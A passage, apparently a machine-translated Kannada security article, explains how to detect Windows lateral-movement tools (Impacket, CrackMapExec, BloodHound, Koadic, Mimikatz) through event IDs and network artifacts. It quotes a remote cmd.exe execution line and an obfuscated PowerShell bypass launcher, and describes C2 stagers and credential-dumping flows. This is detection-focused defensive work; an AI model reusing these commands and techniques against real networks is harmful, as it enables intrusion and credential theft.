2. 4688 - ಪಾಯಿಂಟ್ 1 ರಿಂದ ವಾದಗಳೊಂದಿಗೆ cmd.exe ಪ್ರಕ್ರಿಯೆಯ ರಚನೆ.
3. 5145 - C$ ಡೈರೆಕ್ಟರಿಯಲ್ಲಿ __ಔಟ್‌ಪುಟ್ ಫೈಲ್‌ಗೆ ಪ್ರವೇಶ ಹಕ್ಕುಗಳನ್ನು ಪರಿಶೀಲಿಸಲಾಗುತ್ತಿದೆ.
4. 4697 - ಬಲಿಪಶುವಿನ ಯಂತ್ರದಲ್ಲಿ ಸೇವೆಯ ಸ್ಥಾಪನೆ.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ಪಾಯಿಂಟ್ 4 ರಿಂದ ವಾದಗಳೊಂದಿಗೆ cmd.exe ಪ್ರಕ್ರಿಯೆಯ ರಚನೆ.
6. 5145 - C$ ಡೈರೆಕ್ಟರಿಯಲ್ಲಿ __ಔಟ್‌ಪುಟ್ ಫೈಲ್‌ಗೆ ಪ್ರವೇಶ ಹಕ್ಕುಗಳನ್ನು ಪರಿಶೀಲಿಸಲಾಗುತ್ತಿದೆ.

ದಾಳಿಯ ಸಾಧನಗಳ ಅಭಿವೃದ್ಧಿಗೆ ಇಂಪ್ಯಾಕ್ಟ್ ಆಧಾರವಾಗಿದೆ. ಇದು ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದಲ್ಲಿ ಬಹುತೇಕ ಎಲ್ಲಾ ಪ್ರೋಟೋಕಾಲ್‌ಗಳನ್ನು ಬೆಂಬಲಿಸುತ್ತದೆ ಮತ್ತು ಅದೇ ಸಮಯದಲ್ಲಿ ತನ್ನದೇ ಆದ ವಿಶಿಷ್ಟ ಲಕ್ಷಣಗಳನ್ನು ಹೊಂದಿದೆ. ಇಲ್ಲಿ ನಿರ್ದಿಷ್ಟ winreg ವಿನಂತಿಗಳು, ಮತ್ತು ವಿಶಿಷ್ಟವಾದ ಆದೇಶ ರಚನೆಯೊಂದಿಗೆ SCM API ಬಳಕೆ, ಮತ್ತು ಫೈಲ್ ಹೆಸರು ಸ್ವರೂಪ, ಮತ್ತು SMB ಹಂಚಿಕೆ SYSTEM32.

ಕ್ರ್ಯಾಕ್ಮ್ಯಾಪೆಕ್ಸೆಕ್

CME ಉಪಕರಣವನ್ನು ಪ್ರಾಥಮಿಕವಾಗಿ ನೆಟ್‌ವರ್ಕ್‌ನಲ್ಲಿ ಮುನ್ನಡೆಸಲು ಆಕ್ರಮಣಕಾರರು ನಿರ್ವಹಿಸಬೇಕಾದ ಆ ದಿನನಿತ್ಯದ ಕ್ರಿಯೆಗಳನ್ನು ಸ್ವಯಂಚಾಲಿತಗೊಳಿಸಲು ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗಿದೆ. ಇದು ನಿಮಗೆ ಪ್ರಸಿದ್ಧ ಎಂಪೈರ್ ಏಜೆಂಟ್ ಮತ್ತು ಮೀಟರ್‌ಪ್ರೆಟರ್ ಜೊತೆಯಲ್ಲಿ ಕೆಲಸ ಮಾಡಲು ಅನುಮತಿಸುತ್ತದೆ. ರಹಸ್ಯವಾಗಿ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು, CME ಅವುಗಳನ್ನು ಅಸ್ಪಷ್ಟಗೊಳಿಸಬಹುದು. ಬ್ಲಡ್‌ಹೌಂಡ್ (ಪ್ರತ್ಯೇಕ ವಿಚಕ್ಷಣ ಸಾಧನ) ಬಳಸಿಕೊಂಡು ಆಕ್ರಮಣಕಾರರು ಸಕ್ರಿಯ ಡೊಮೇನ್ ನಿರ್ವಾಹಕರ ಸೆಶನ್‌ಗಾಗಿ ಹುಡುಕಾಟವನ್ನು ಸ್ವಯಂಚಾಲಿತಗೊಳಿಸಬಹುದು.

ಬ್ಲಡ್ಹೌಂಡ್ನ

ಬ್ಲಡ್‌ಹೌಂಡ್, ಸ್ವತಂತ್ರ ಸಾಧನವಾಗಿ, ನೆಟ್‌ವರ್ಕ್‌ನಲ್ಲಿ ಸುಧಾರಿತ ವಿಚಕ್ಷಣವನ್ನು ಅನುಮತಿಸುತ್ತದೆ. ಇದು ಬಳಕೆದಾರರು, ಯಂತ್ರಗಳು, ಗುಂಪುಗಳು, ಸೆಷನ್‌ಗಳ ಕುರಿತು ಡೇಟಾವನ್ನು ಸಂಗ್ರಹಿಸುತ್ತದೆ ಮತ್ತು ಪವರ್‌ಶೆಲ್ ಸ್ಕ್ರಿಪ್ಟ್ ಅಥವಾ ಬೈನರಿ ಫೈಲ್‌ನಂತೆ ಸರಬರಾಜು ಮಾಡಲಾಗುತ್ತದೆ. ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸಲು LDAP ಅಥವಾ SMB ಆಧಾರಿತ ಪ್ರೋಟೋಕಾಲ್‌ಗಳನ್ನು ಬಳಸಲಾಗುತ್ತದೆ. CME ಏಕೀಕರಣ ಮಾಡ್ಯೂಲ್ ಬಲಿಪಶುವಿನ ಯಂತ್ರಕ್ಕೆ ಬ್ಲಡ್‌ಹೌಂಡ್ ಅನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡಲು, ಅದನ್ನು ಚಲಾಯಿಸಲು ಮತ್ತು ಮರಣದಂಡನೆಯ ನಂತರ ಸಂಗ್ರಹಿಸಿದ ಡೇಟಾವನ್ನು ಸ್ವೀಕರಿಸಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ, ಇದರಿಂದಾಗಿ ಸಿಸ್ಟಮ್‌ನಲ್ಲಿನ ಕ್ರಿಯೆಗಳನ್ನು ಸ್ವಯಂಚಾಲಿತಗೊಳಿಸುತ್ತದೆ ಮತ್ತು ಅವುಗಳನ್ನು ಕಡಿಮೆ ಗಮನಿಸುವಂತೆ ಮಾಡುತ್ತದೆ. ಬ್ಲಡ್‌ಹೌಂಡ್ ಗ್ರಾಫಿಕಲ್ ಶೆಲ್ ಸಂಗ್ರಹಿಸಿದ ಡೇಟಾವನ್ನು ಗ್ರಾಫ್‌ಗಳ ರೂಪದಲ್ಲಿ ಪ್ರಸ್ತುತಪಡಿಸುತ್ತದೆ, ಇದು ಆಕ್ರಮಣಕಾರರ ಯಂತ್ರದಿಂದ ಡೊಮೇನ್ ನಿರ್ವಾಹಕರಿಗೆ ಕಡಿಮೆ ಮಾರ್ಗವನ್ನು ಕಂಡುಹಿಡಿಯಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ.

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಅಕ್ಕಿ. 6. ಬ್ಲಡ್ಹೌಂಡ್ ಇಂಟರ್ಫೇಸ್

ಬಲಿಪಶುವಿನ ಯಂತ್ರದಲ್ಲಿ ಚಲಾಯಿಸಲು, ಮಾಡ್ಯೂಲ್ ATSVC ಮತ್ತು SMB ಬಳಸಿ ಕಾರ್ಯವನ್ನು ರಚಿಸುತ್ತದೆ. ATSVC ಎಂಬುದು ವಿಂಡೋಸ್ ಟಾಸ್ಕ್ ಶೆಡ್ಯೂಲರ್‌ನೊಂದಿಗೆ ಕೆಲಸ ಮಾಡಲು ಇಂಟರ್ಫೇಸ್ ಆಗಿದೆ. CME ನೆಟ್‌ವರ್ಕ್‌ನಲ್ಲಿ ಕಾರ್ಯಗಳನ್ನು ರಚಿಸಲು ಅದರ NetrJobAdd(1) ಕಾರ್ಯವನ್ನು ಬಳಸುತ್ತದೆ. CME ಮಾಡ್ಯೂಲ್ ಏನು ಕಳುಹಿಸುತ್ತದೆ ಎಂಬುದರ ಉದಾಹರಣೆಯನ್ನು ಅಂಜೂರದಲ್ಲಿ ತೋರಿಸಲಾಗಿದೆ. 7: ಇದು cmd.exe ಕಮಾಂಡ್ ಕರೆ ಮತ್ತು XML ಫಾರ್ಮ್ಯಾಟ್‌ನಲ್ಲಿ ಆರ್ಗ್ಯುಮೆಂಟ್‌ಗಳ ರೂಪದಲ್ಲಿ ಅಸ್ಪಷ್ಟ ಕೋಡ್ ಆಗಿದೆ.

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಚಿತ್ರ.7. CME ಮೂಲಕ ಕಾರ್ಯವನ್ನು ರಚಿಸುವುದು

ಕಾರ್ಯವನ್ನು ಮರಣದಂಡನೆಗೆ ಸಲ್ಲಿಸಿದ ನಂತರ, ಬಲಿಪಶುವಿನ ಯಂತ್ರವು ಸ್ವತಃ ಬ್ಲಡ್‌ಹೌಂಡ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸುತ್ತದೆ ಮತ್ತು ಇದನ್ನು ಟ್ರಾಫಿಕ್‌ನಲ್ಲಿ ಕಾಣಬಹುದು. ಪ್ರಮಾಣಿತ ಗುಂಪುಗಳನ್ನು ಪಡೆಯಲು LDAP ಪ್ರಶ್ನೆಗಳಿಂದ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ನಿರೂಪಿಸಲಾಗಿದೆ, ಡೊಮೇನ್‌ನಲ್ಲಿರುವ ಎಲ್ಲಾ ಯಂತ್ರಗಳು ಮತ್ತು ಬಳಕೆದಾರರ ಪಟ್ಟಿ, ಮತ್ತು SRVSVC NetSessEnum ವಿನಂತಿಯ ಮೂಲಕ ಸಕ್ರಿಯ ಬಳಕೆದಾರ ಅವಧಿಗಳ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಪಡೆದುಕೊಳ್ಳಿ.

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಅಕ್ಕಿ. 8. SMB ಮೂಲಕ ಸಕ್ರಿಯ ಅವಧಿಗಳ ಪಟ್ಟಿಯನ್ನು ಪಡೆಯುವುದು

ಹೆಚ್ಚುವರಿಯಾಗಿ, ಆಡಿಟಿಂಗ್ ಅನ್ನು ಸಕ್ರಿಯಗೊಳಿಸಿದ ಬಲಿಪಶುವಿನ ಯಂತ್ರದಲ್ಲಿ ಬ್ಲಡ್‌ಹೌಂಡ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸುವುದು ID 4688 (ಪ್ರಕ್ರಿಯೆ ರಚನೆ) ಮತ್ತು ಪ್ರಕ್ರಿಯೆಯ ಹೆಸರಿನೊಂದಿಗೆ ಈವೆಂಟ್‌ನೊಂದಿಗೆ ಇರುತ್ತದೆ «C:WindowsSystem32cmd.exe». ಆಜ್ಞಾ ಸಾಲಿನ ಆರ್ಗ್ಯುಮೆಂಟ್‌ಗಳು ಅದರಲ್ಲಿ ಗಮನಾರ್ಹವಾದವುಗಳಾಗಿವೆ:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

ಕ್ರಿಯಾತ್ಮಕತೆ ಮತ್ತು ಅನುಷ್ಠಾನದ ದೃಷ್ಟಿಯಿಂದ enum_avproducts ಮಾಡ್ಯೂಲ್ ತುಂಬಾ ಆಸಕ್ತಿದಾಯಕವಾಗಿದೆ. ವಿವಿಧ ವಿಂಡೋಸ್ ಆಬ್ಜೆಕ್ಟ್‌ಗಳಿಂದ ಡೇಟಾವನ್ನು ಹಿಂಪಡೆಯಲು WQL ಪ್ರಶ್ನೆ ಭಾಷೆಯನ್ನು ಬಳಸಲು WMI ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ, ಇದು ಮೂಲಭೂತವಾಗಿ ಈ CME ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಬಳಸುತ್ತದೆ. ಬಲಿಪಶುವಿನ ಯಂತ್ರದಲ್ಲಿ ಸ್ಥಾಪಿಸಲಾದ ರಕ್ಷಣಾ ಸಾಧನಗಳ ಕುರಿತು ಆಂಟಿಸ್ಪೈವೇರ್ ಉತ್ಪನ್ನ ಮತ್ತು ಆಂಟಿಮೈರಸ್ ಉತ್ಪನ್ನ ತರಗತಿಗಳಿಗೆ ಇದು ಪ್ರಶ್ನೆಗಳನ್ನು ಉತ್ಪಾದಿಸುತ್ತದೆ. ಅಗತ್ಯ ಡೇಟಾವನ್ನು ಪಡೆಯಲು, ಮಾಡ್ಯೂಲ್ ರೂಟ್‌ಸೆಕ್ಯುರಿಟಿ ಸೆಂಟರ್ 2 ನೇಮ್‌ಸ್ಪೇಸ್‌ಗೆ ಸಂಪರ್ಕಿಸುತ್ತದೆ, ನಂತರ WQL ಪ್ರಶ್ನೆಯನ್ನು ಉತ್ಪಾದಿಸುತ್ತದೆ ಮತ್ತು ಪ್ರತಿಕ್ರಿಯೆಯನ್ನು ಪಡೆಯುತ್ತದೆ. ಅಂಜೂರದಲ್ಲಿ. ಚಿತ್ರ 9 ಅಂತಹ ವಿನಂತಿಗಳು ಮತ್ತು ಪ್ರತಿಕ್ರಿಯೆಗಳ ವಿಷಯಗಳನ್ನು ತೋರಿಸುತ್ತದೆ. ನಮ್ಮ ಉದಾಹರಣೆಯಲ್ಲಿ, ವಿಂಡೋಸ್ ಡಿಫೆಂಡರ್ ಕಂಡುಬಂದಿದೆ.

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಅಕ್ಕಿ. 9. enum_avproducts ಮಾಡ್ಯೂಲ್‌ನ ನೆಟ್‌ವರ್ಕ್ ಚಟುವಟಿಕೆ

ಸಾಮಾನ್ಯವಾಗಿ, WMI ಆಡಿಟಿಂಗ್ (ಟ್ರೇಸ್ WMI-ಚಟುವಟಿಕೆ), ಅದರ ಈವೆಂಟ್‌ಗಳಲ್ಲಿ ನೀವು WQL ಪ್ರಶ್ನೆಗಳ ಬಗ್ಗೆ ಉಪಯುಕ್ತ ಮಾಹಿತಿಯನ್ನು ಕಾಣಬಹುದು, ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಬಹುದು. ಆದರೆ ಅದನ್ನು ಸಕ್ರಿಯಗೊಳಿಸಿದರೆ, enum_avproducts ಸ್ಕ್ರಿಪ್ಟ್ ರನ್ ಆಗಿದ್ದರೆ, ID 11 ರೊಂದಿಗಿನ ಈವೆಂಟ್ ಅನ್ನು ಉಳಿಸಲಾಗುತ್ತದೆ. ಇದು ವಿನಂತಿಯನ್ನು ಕಳುಹಿಸಿದ ಬಳಕೆದಾರರ ಹೆಸರನ್ನು ಮತ್ತು rootSecurityCenter2 ನೇಮ್‌ಸ್ಪೇಸ್‌ನಲ್ಲಿ ಹೆಸರನ್ನು ಹೊಂದಿರುತ್ತದೆ.

ಪ್ರತಿಯೊಂದು CME ಮಾಡ್ಯೂಲ್‌ಗಳು ತನ್ನದೇ ಆದ ಕಲಾಕೃತಿಗಳನ್ನು ಹೊಂದಿದ್ದು, ನಿರ್ದಿಷ್ಟ WQL ಪ್ರಶ್ನೆಗಳು ಅಥವಾ LDAP ಮತ್ತು SMB ಯಲ್ಲಿ ಅಸ್ಪಷ್ಟತೆ ಮತ್ತು ಬ್ಲಡ್‌ಹೌಂಡ್-ನಿರ್ದಿಷ್ಟ ಚಟುವಟಿಕೆಯೊಂದಿಗೆ ಟಾಸ್ಕ್ ಶೆಡ್ಯೂಲರ್‌ನಲ್ಲಿ ನಿರ್ದಿಷ್ಟ ರೀತಿಯ ಕಾರ್ಯವನ್ನು ರಚಿಸಬಹುದು.

KOADIC

Koadic ನ ವಿಶಿಷ್ಟ ಲಕ್ಷಣವೆಂದರೆ Windows ನಲ್ಲಿ ನಿರ್ಮಿಸಲಾದ JavaScript ಮತ್ತು VBScript ಇಂಟರ್ಪ್ರಿಟರ್‌ಗಳ ಬಳಕೆಯಾಗಿದೆ. ಈ ಅರ್ಥದಲ್ಲಿ, ಇದು ಭೂಮಿಯ ಪ್ರವೃತ್ತಿಯನ್ನು ಅನುಸರಿಸುತ್ತದೆ - ಅಂದರೆ, ಇದು ಯಾವುದೇ ಬಾಹ್ಯ ಅವಲಂಬನೆಗಳನ್ನು ಹೊಂದಿಲ್ಲ ಮತ್ತು ಪ್ರಮಾಣಿತ ವಿಂಡೋಸ್ ಪರಿಕರಗಳನ್ನು ಬಳಸುತ್ತದೆ. ಇದು ಸಂಪೂರ್ಣ ಕಮಾಂಡ್ ಮತ್ತು ಕಂಟ್ರೋಲ್ (CnC) ಗಾಗಿ ಒಂದು ಸಾಧನವಾಗಿದೆ, ಏಕೆಂದರೆ ಸೋಂಕಿನ ನಂತರ ಯಂತ್ರದಲ್ಲಿ "ಇಂಪ್ಲಾಂಟ್" ಅನ್ನು ಸ್ಥಾಪಿಸಲಾಗಿದೆ, ಅದನ್ನು ನಿಯಂತ್ರಿಸಲು ಅನುವು ಮಾಡಿಕೊಡುತ್ತದೆ. ಇಂತಹ ಯಂತ್ರವನ್ನು ಕೋಡಿಕ್ ಪರಿಭಾಷೆಯಲ್ಲಿ "ಜೊಂಬಿ" ಎಂದು ಕರೆಯಲಾಗುತ್ತದೆ. ಬಲಿಪಶುವಿನ ಕಡೆಯಿಂದ ಪೂರ್ಣ ಕಾರ್ಯಾಚರಣೆಗೆ ಸಾಕಷ್ಟು ಸವಲತ್ತುಗಳಿಲ್ಲದಿದ್ದರೆ, ಬಳಕೆದಾರ ಖಾತೆ ನಿಯಂತ್ರಣ ಬೈಪಾಸ್ (UAC ಬೈಪಾಸ್) ತಂತ್ರಗಳನ್ನು ಬಳಸಿಕೊಂಡು ಅವುಗಳನ್ನು ಸಂಗ್ರಹಿಸುವ ಸಾಮರ್ಥ್ಯವನ್ನು Koadic ಹೊಂದಿದೆ.

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಅಕ್ಕಿ. 10. ಕೋಡಿಕ್ ಶೆಲ್

ಬಲಿಪಶು ಕಮಾಂಡ್ ಮತ್ತು ಕಂಟ್ರೋಲ್ ಸರ್ವರ್‌ನೊಂದಿಗೆ ಸಂವಹನವನ್ನು ಪ್ರಾರಂಭಿಸಬೇಕು. ಇದನ್ನು ಮಾಡಲು, ಅವಳು ಹಿಂದೆ ಸಿದ್ಧಪಡಿಸಿದ URI ಅನ್ನು ಸಂಪರ್ಕಿಸಬೇಕು ಮತ್ತು ಸ್ಟೇಜರ್‌ಗಳಲ್ಲಿ ಒಂದನ್ನು ಬಳಸಿಕೊಂಡು ಮುಖ್ಯ ಕೋಡಿಕ್ ದೇಹವನ್ನು ಸ್ವೀಕರಿಸಬೇಕು. ಅಂಜೂರದಲ್ಲಿ. ಚಿತ್ರ 11 mshta ಸ್ಟೇಜರ್‌ಗೆ ಉದಾಹರಣೆಯನ್ನು ತೋರಿಸುತ್ತದೆ.

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಅಕ್ಕಿ. 11. CnC ಸರ್ವರ್‌ನೊಂದಿಗೆ ಅಧಿವೇಶನವನ್ನು ಪ್ರಾರಂಭಿಸುವುದು

ಪ್ರತಿಕ್ರಿಯೆ ವೇರಿಯೇಬಲ್ WS ಅನ್ನು ಆಧರಿಸಿ, WScript.Shell ಮೂಲಕ ಮರಣದಂಡನೆ ಸಂಭವಿಸುತ್ತದೆ ಮತ್ತು STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ವೇರಿಯೇಬಲ್‌ಗಳು ಪ್ರಸ್ತುತ ಅಧಿವೇಶನದ ನಿಯತಾಂಕಗಳ ಕುರಿತು ಪ್ರಮುಖ ಮಾಹಿತಿಯನ್ನು ಒಳಗೊಂಡಿರುತ್ತವೆ ಎಂಬುದು ಸ್ಪಷ್ಟವಾಗುತ್ತದೆ. CnC ಸರ್ವರ್‌ನೊಂದಿಗೆ HTTP ಸಂಪರ್ಕದಲ್ಲಿ ಇದು ಮೊದಲ ವಿನಂತಿ-ಪ್ರತಿಕ್ರಿಯೆ ಜೋಡಿಯಾಗಿದೆ. ನಂತರದ ವಿನಂತಿಗಳು ಕರೆಯಲ್ಪಡುವ ಮಾಡ್ಯೂಲ್‌ಗಳ (ಇಂಪ್ಲಾಂಟ್‌ಗಳು) ಕ್ರಿಯಾತ್ಮಕತೆಗೆ ನೇರವಾಗಿ ಸಂಬಂಧಿಸಿವೆ. ಎಲ್ಲಾ ಕೋಡಿಕ್ ಮಾಡ್ಯೂಲ್‌ಗಳು CnC ಯೊಂದಿಗೆ ಸಕ್ರಿಯ ಸೆಶನ್‌ನೊಂದಿಗೆ ಮಾತ್ರ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತವೆ.

ಮಿಮಿಕಾಟ್ಜ್

CME ಬ್ಲಡ್‌ಹೌಂಡ್‌ನೊಂದಿಗೆ ಕಾರ್ಯನಿರ್ವಹಿಸುವಂತೆಯೇ, Koadic ಮಿಮಿಕಾಟ್ಜ್‌ನೊಂದಿಗೆ ಪ್ರತ್ಯೇಕ ಪ್ರೋಗ್ರಾಂ ಆಗಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ ಮತ್ತು ಅದನ್ನು ಪ್ರಾರಂಭಿಸಲು ಹಲವು ಮಾರ್ಗಗಳನ್ನು ಹೊಂದಿದೆ. ಮಿಮಿಕಾಟ್ಜ್ ಇಂಪ್ಲಾಂಟ್ ಅನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡಲು ವಿನಂತಿ-ಪ್ರತಿಕ್ರಿಯೆ ಜೋಡಿಯನ್ನು ಕೆಳಗೆ ನೀಡಲಾಗಿದೆ.

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಅಕ್ಕಿ. 12. ಮಿಮಿಕಾಟ್ಜ್ ಅನ್ನು ಕೋಡಿಕ್‌ಗೆ ವರ್ಗಾಯಿಸಿ

ವಿನಂತಿಯಲ್ಲಿನ URI ಫಾರ್ಮ್ಯಾಟ್ ಹೇಗೆ ಬದಲಾಗಿದೆ ಎಂಬುದನ್ನು ನೀವು ನೋಡಬಹುದು. ಇದು ಈಗ csrf ವೇರಿಯೇಬಲ್‌ಗಾಗಿ ಮೌಲ್ಯವನ್ನು ಹೊಂದಿದೆ, ಇದು ಆಯ್ದ ಮಾಡ್ಯೂಲ್‌ಗೆ ಕಾರಣವಾಗಿದೆ. ಅವಳ ಹೆಸರಿಗೆ ಗಮನ ಕೊಡಬೇಡ; CSRF ಅನ್ನು ಸಾಮಾನ್ಯವಾಗಿ ವಿಭಿನ್ನವಾಗಿ ಅರ್ಥೈಸಿಕೊಳ್ಳುವುದು ನಮಗೆಲ್ಲರಿಗೂ ತಿಳಿದಿದೆ. ಪ್ರತಿಕ್ರಿಯೆಯು ಕೋಡಿಕ್‌ನ ಅದೇ ಮುಖ್ಯ ಭಾಗವಾಗಿತ್ತು, ಇದಕ್ಕೆ ಮಿಮಿಕಾಟ್ಜ್‌ಗೆ ಸಂಬಂಧಿಸಿದ ಕೋಡ್ ಅನ್ನು ಸೇರಿಸಲಾಗಿದೆ. ಇದು ಸಾಕಷ್ಟು ದೊಡ್ಡದಾಗಿದೆ, ಆದ್ದರಿಂದ ಪ್ರಮುಖ ಅಂಶಗಳನ್ನು ನೋಡೋಣ. ಇಲ್ಲಿ ನಾವು Mimikatz ಲೈಬ್ರರಿಯನ್ನು Base64 ರಲ್ಲಿ ಎನ್‌ಕೋಡ್ ಮಾಡಿದ್ದೇವೆ, ಒಂದು ಧಾರಾವಾಹಿ .NET ಕ್ಲಾಸ್ ಅನ್ನು ಇಂಜೆಕ್ಟ್ ಮಾಡುತ್ತದೆ ಮತ್ತು Mimikatz ಅನ್ನು ಪ್ರಾರಂಭಿಸಲು ವಾದಗಳನ್ನು ಹೊಂದಿದ್ದೇವೆ. ಮರಣದಂಡನೆಯ ಫಲಿತಾಂಶವನ್ನು ಸ್ಪಷ್ಟ ಪಠ್ಯದಲ್ಲಿ ನೆಟ್ವರ್ಕ್ ಮೂಲಕ ರವಾನಿಸಲಾಗುತ್ತದೆ.

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಅಕ್ಕಿ. 13. ರಿಮೋಟ್ ಗಣಕದಲ್ಲಿ Mimikatz ಚಾಲನೆಯಲ್ಲಿರುವ ಫಲಿತಾಂಶ

Exec_cmd

Koadic ಸಹ ಮಾಡ್ಯೂಲ್‌ಗಳನ್ನು ಹೊಂದಿದ್ದು ಅದು ದೂರದಿಂದಲೇ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದು. ಇಲ್ಲಿ ನಾವು ಅದೇ URI ಉತ್ಪಾದನೆಯ ವಿಧಾನವನ್ನು ಮತ್ತು ಪರಿಚಿತ sid ಮತ್ತು csrf ವೇರಿಯೇಬಲ್‌ಗಳನ್ನು ನೋಡುತ್ತೇವೆ. Exec_cmd ಮಾಡ್ಯೂಲ್‌ನ ಸಂದರ್ಭದಲ್ಲಿ, ಶೆಲ್ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವ ಸಾಮರ್ಥ್ಯವನ್ನು ಹೊಂದಿರುವ ದೇಹಕ್ಕೆ ಕೋಡ್ ಅನ್ನು ಸೇರಿಸಲಾಗುತ್ತದೆ. CnC ಸರ್ವರ್‌ನ HTTP ಪ್ರತಿಕ್ರಿಯೆಯಲ್ಲಿರುವ ಅಂತಹ ಕೋಡ್ ಅನ್ನು ಕೆಳಗೆ ತೋರಿಸಲಾಗಿದೆ.

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಅಕ್ಕಿ. 14. ಇಂಪ್ಲಾಂಟ್ ಕೋಡ್ exec_cmd

ಕೋಡ್ ಎಕ್ಸಿಕ್ಯೂಶನ್‌ಗಾಗಿ ಪರಿಚಿತ WS ಗುಣಲಕ್ಷಣದೊಂದಿಗೆ GAWTUUGCFI ವೇರಿಯೇಬಲ್ ಅಗತ್ಯವಿದೆ. ಅದರ ಸಹಾಯದಿಂದ, ಇಂಪ್ಲಾಂಟ್ ಶೆಲ್ ಅನ್ನು ಕರೆಯುತ್ತದೆ, ಕೋಡ್ನ ಎರಡು ಶಾಖೆಗಳನ್ನು ಪ್ರಕ್ರಿಯೆಗೊಳಿಸುತ್ತದೆ - shell.exec ಔಟ್ಪುಟ್ ಡೇಟಾ ಸ್ಟ್ರೀಮ್ನ ಹಿಂತಿರುಗಿಸುವಿಕೆಯೊಂದಿಗೆ ಮತ್ತು ಹಿಂತಿರುಗಿಸದೆ shell.run.

ಕೋಡಿಕ್ ಒಂದು ವಿಶಿಷ್ಟ ಸಾಧನವಲ್ಲ, ಆದರೆ ಇದು ತನ್ನದೇ ಆದ ಕಲಾಕೃತಿಗಳನ್ನು ಹೊಂದಿದೆ, ಅದರ ಮೂಲಕ ಅದನ್ನು ಕಾನೂನುಬದ್ಧ ಸಂಚಾರದಲ್ಲಿ ಕಾಣಬಹುದು:

  • HTTP ವಿನಂತಿಗಳ ವಿಶೇಷ ರಚನೆ,
  • winHttpRequests API ಬಳಸಿ,
  • ActiveXObject ಮೂಲಕ WScript.Shell ವಸ್ತುವನ್ನು ರಚಿಸುವುದು,
  • ದೊಡ್ಡ ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದಾದ ದೇಹ.

